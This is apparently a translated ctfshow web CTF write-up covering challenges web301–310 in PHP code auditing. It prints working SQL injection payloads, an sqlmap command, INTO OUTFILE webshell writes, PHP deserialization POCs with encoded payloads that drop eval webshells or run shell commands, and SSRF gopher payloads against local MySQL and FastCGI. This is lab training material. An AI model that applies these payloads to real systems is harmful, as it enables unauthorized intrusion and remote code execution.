当前位置：网站首页>Ctfshow web entry code audit

Ctfshow web entry code audit

2022-07-05 04:03:00 【Sentiment._】

web301

Download the source code in checklogin.php Find the problem code

$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
$result=$mysqli->query($sql);
$row=$result->fetch_array(MYSQLI_BOTH);
if($result->num_rows<1){
    
	$_SESSION['error']="1";
	header("location:login.php");
	return;
}
if(!strcasecmp($userpwd,$row['sds_password'])){
    
	$_SESSION['login']=1;
	$result->free();
	$mysqli->close();
	header("location:index.php");
	return;
}

sql There is no filtering in the statement and username controllable , But there is one below strcasecmp Function to compare , Only with the same user name and password can login successfully

strcasecmp(string1,string2)
string1  It's necessary . Specify the first string to compare .
string2  It's necessary . Specify the second string to compare .

Return logic :

0 -  If two strings are equal 
<0 -  If  string1  Less than  string2
>0 -  If  string1  Greater than  string2

So if we want to log in successfully, we need the same user name and password , The return value is 0, after strcasecmp The front one ! operation , Successfully logged in , Here you can use the joint query to make username return 1, After equality $_SESSION['login']=1; You can bypass seesion Verify entry index.php Interface
payload:

userid=1'union select 1#&userpwd=1

In addition, this question is also available sqlmap Just a shuttle

python sqlmap.py -u"http://efad7348-9ec6-4684-9f9e-31f3c5d5d1af.challenge.ctf.show/checklogin.php" --data="userid=1&userpwd=1" --batch --dump

You can also write shell The way

userid=a ' union select "<?php eval($_POST[1]);?>" into outfile "/var/www/html/a.php"%23&userpwd=b

web302

The modified part ：if(!strcasecmp(sds_decode($userpwd),$row['sds_password']))
From the above question userpwd Change into sds_decode($userpwd)
Actually sds_decode Function is to put its own 1 Conduct md5 Encrypted nesting becomes ：d9c77c4e454869d5d8da3b4be79694d3

payload:

userid=1'union select 'd9c77c4e454869d5d8da3b4be79694d3' #&userpwd=1

Or directly shell Even though sds_decode() Function processing , But his sql Statement has been executed

userid=a ' union select "<?php eval($_POST[1]);?>" into outfile "/var/www/html/a.php"%23&userpwd=b

web303

Previous checklogin.php There are more judgment statements in , So the injection point here is not available

But there are more in the source code dpt.php and dptadd.php, stay dptadd.php Injection point found in , But there is a premise that you must log in successfully , Guess weak password admin/admin Landing successful

Unfiltered insert Inject
payload:

 Look up the name of the table 
1',sds_address =(select group_concat(table_name) from information_schema.tables where table_schema=database())#
 Look up the list name 
1',sds_address =(select group_concat(table_name) from information_schema.tables where table_schema=database())#1',sds_address =(select group_concat(column_name) from information_schema.columns where table_name='sds_fl9g')#
 Check data 
1',sds_address =(select flag from sds_fl9g)#

web304

Add the overall situation waf, But the last question payload You can get through

web305

Add waf, therefore sql Injection will not work

stay checklogin.php A deserialization point is added in

And one more class.php, Among them is file_put_contents Function can be used as the breakthrough point of this problem

poc

<?php
class user{
    
    public $username;
    public $password;
    public function __construct($u,$p){
    
        $this->username=$u;
        $this->password=$p;
    }
}
echo urlencode(serialize(new user('2.php','<?php eval($_POST[1]);?>')));
?>

stay checklogin.php in , Pass the value to cookie Of user Parameters in , It can generate 2.php

But the ant sword was not found after connecting flag file , So guess flag In the database , Try to connect to the database

Password and other information are conn.php in

After successful linking flag In the database

web306

stay class.php Found in file_put_contents()

But you need to call close() Method , So the next step is to find out where this method is used , stay dao.php Found using this method

Found a point of use , Now you need to find a deserialization entry , Find out login.php and index.php There's... In it unserialize, but php Must contain dao.php and class.php So you can only use index.php The deserialization entry of passes parameters
poc

<?php
class log{
    
    public $title='1.php';
    public $info='<?php eval($_POST[a]);?>';
}
class dao{
    
    private $conn;

    public function __construct(){
    
        $this->conn=new log();
    }
}
echo base64_encode(serialize(new dao()));

//TzozOiJkYW8iOjE6e3M6OToiAGRhbwBjb25uIjtPOjM6ImxvZyI6Mjp7czo1OiJ0aXRsZSI7czo1OiIxLnBocCI7czo0OiJpbmZvIjtzOjI0OiI8P3BocCBldmFsKCRfUE9TVFthXSk7Pz4iO319

The account password is admin/admin1, After landing, jump to index.php Interface , take payload Pass to cookie Medium user It was generated 1.php

web307

In the above question close The method becomes closelog(), So in dao Class cannot be called , And after a global search dao Class close() Methods are also not searchable , So we need to find other utilization points
seay Source code audit found shell_exec function

Need to call clearCache() Method

stay logout.php Will directly call clearCache Method

In this method config yes dao Variables in class ,cache_dir yes login Class

So what needs to be done here is to modify $this->config->cache_dir Value , To carry out our orders
poc

<?php
class config
{
    
    public $cache_dir = 'cache/*;cat /var/www/html/flag.php > /var/www/html/1.txt;';
}
class dao
{
       private $config;
    public function __construct(){
    
        $this->config=new config();
}}
$a = new dao();
echo base64_encode(serialize($a));
?>

to cookie Medium service visit 1.txt obtain flag

web308

Compare with the above question RCE This topic , After regular filtering, you must be pure letters to execute commands , Therefore, this point cannot be used

But more checkVersion() and checkUpdate() Method

To follow up fun.php See more ssrf Utilization point of

And in the config.php Found in mysql The database has no password , There are more below url Parameters can be combined checkUpdate() Method dissemination , So guess this question is to hit mysql 了
![image-20220212161707585](https://img-blog.csdnimg.cn/img_convert/eacfcbcb9fc724ba5bf4d51ec7aad65d.png

And in index.php Deserialization entry found in , And will call checkVersion() Method , Go on ssrf( notes ： Even if you don't log in header The code after jump can be executed normally )

So this question needs to pass now dao Classes and config Class modification &this->config and $update_url Value
According to the topic tips , use gopher Write shell that will do

select "<?php eval($_POST[1]);?>" into outfile "/var/www/html/2.php"

poc

<?php
class config{
    
    public $update_url = 'gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%45%00%00%00%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%29%3b%3f%3e%22%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%22%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%32%2e%70%68%70%22%01%00%00%00%01';
}
class dao{
    
    private $config;

    public function __construct(){
    
        $this->config=new config();
    }
}
echo base64_encode(serialize(new dao()));

//TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czoxMDoidXBkYXRlX3VybCI7czo3NjA6ImdvcGhlcjovLzEyNy4wLjAuMTozMzA2L18lYTMlMDAlMDAlMDElODUlYTYlZmYlMDElMDAlMDAlMDAlMDElMjElMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlNzIlNmYlNmYlNzQlMDAlMDAlNmQlNzklNzMlNzElNmMlNWYlNmUlNjElNzQlNjklNzYlNjUlNWYlNzAlNjElNzMlNzMlNzclNmYlNzIlNjQlMDAlNjYlMDMlNWYlNmYlNzMlMDUlNGMlNjklNmUlNzUlNzglMGMlNWYlNjMlNmMlNjklNjUlNmUlNzQlNWYlNmUlNjElNmQlNjUlMDglNmMlNjklNjIlNmQlNzklNzMlNzElNmMlMDQlNWYlNzAlNjklNjQlMDUlMzIlMzclMzIlMzUlMzUlMGYlNWYlNjMlNmMlNjklNjUlNmUlNzQlNWYlNzYlNjUlNzIlNzMlNjklNmYlNmUlMDYlMzUlMmUlMzclMmUlMzIlMzIlMDklNWYlNzAlNmMlNjElNzQlNjYlNmYlNzIlNmQlMDYlNzglMzglMzYlNWYlMzYlMzQlMGMlNzAlNzIlNmYlNjclNzIlNjElNmQlNWYlNmUlNjElNmQlNjUlMDUlNmQlNzklNzMlNzElNmMlNDUlMDAlMDAlMDAlMDMlNzMlNjUlNmMlNjUlNjMlNzQlMjAlMjIlM2MlM2YlNzAlNjglNzAlMjAlNjUlNzYlNjElNmMlMjglMjQlNWYlNTAlNGYlNTMlNTQlNWIlMzElNWQlMjklM2IlM2YlM2UlMjIlMjAlNjklNmUlNzQlNmYlMjAlNmYlNzUlNzQlNjYlNjklNmMlNjUlMjAlMjIlMmYlNzYlNjElNzIlMmYlNzclNzclNzclMmYlNjglNzQlNmQlNmMlMmYlMzIlMmUlNzAlNjglNzAlMjIlMDElMDAlMDAlMDAlMDEiO319

Pass parameter generation 2.php, look for flag that will do

web309

mysql There's a password , adopt gopher The delay judgment guess of the agreement is fastcgi

gopher://127.0.0.1:9000

Keep using gopherus structure payload

poc

<?php
class config{
    
    public $update_url = 'gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%00%F6%06%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH72%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%09SCRIPT_FILENAMEindex.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00H%04%00%3C%3Fphp%20system%28%27cat%20/var/www/html/f%2A%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00';
}
class dao{
    
    private $config;

    public function __construct(){
    
        $this->config=new config();
    }
}
echo base64_encode(serialize(new dao()));

//TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czoxMDoidXBkYXRlX3VybCI7czo1ODc6ImdvcGhlcjovLzEyNy4wLjAuMTo5MDAwL18lMDElMDElMDAlMDElMDAlMDglMDAlMDAlMDAlMDElMDAlMDAlMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlRjYlMDYlMDAlMEYlMTBTRVJWRVJfU09GVFdBUkVnbyUyMC8lMjBmY2dpY2xpZW50JTIwJTBCJTA5UkVNT1RFX0FERFIxMjcuMC4wLjElMEYlMDhTRVJWRVJfUFJPVE9DT0xIVFRQLzEuMSUwRSUwMkNPTlRFTlRfTEVOR1RINzIlMEUlMDRSRVFVRVNUX01FVEhPRFBPU1QlMDlLUEhQX1ZBTFVFYWxsb3dfdXJsX2luY2x1ZGUlMjAlM0QlMjBPbiUwQWRpc2FibGVfZnVuY3Rpb25zJTIwJTNEJTIwJTBBYXV0b19wcmVwZW5kX2ZpbGUlMjAlM0QlMjBwaHAlM0EvL2lucHV0JTBGJTA5U0NSSVBUX0ZJTEVOQU1FaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBIJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3Y2F0JTIwL3Zhci93d3cvaHRtbC9mJTJBJTI3JTI5JTNCZGllJTI4JTI3LS0tLS1NYWRlLWJ5LVNweUQzci0tLS0tJTBBJTI3JTI5JTNCJTNGJTNFJTAwJTAwJTAwJTAwIjt9fQ==

Pass the parameter to get flag

web310

Or fight fastcgi, But read flag When you file , Not read , So look for flag File location

Find out /var/flag

After reading, it is found that it cannot be read , Guess that flag It's a folder ,flag It should be in the document , Read the file

Find out index.html, After reading, get flag

Learn another idea of Master Yu
Read nginx.conf The configuration file

class config{
    
	public $update_url = 'file:///etc/nginx/nginx.conf';
}
class dao{
    
	private $config;
	public function __construct(){
    
		$this->config=new config();
	}

}
$a=new dao();
echo base64_encode(serialize($a));
?>

obtain

server {
        listen       4476;
        server_name  localhost;
        root         /var/flag;
        index index.html;

visit 4476 port

<?php
class config{
    
	public $update_url = 'http://127.0.0.1:4476';
}
class dao{
    
	private $config;
	public function __construct(){
    
		$this->config=new config();
	}
}
$a=new dao();
echo base64_encode(serialize($a));
?>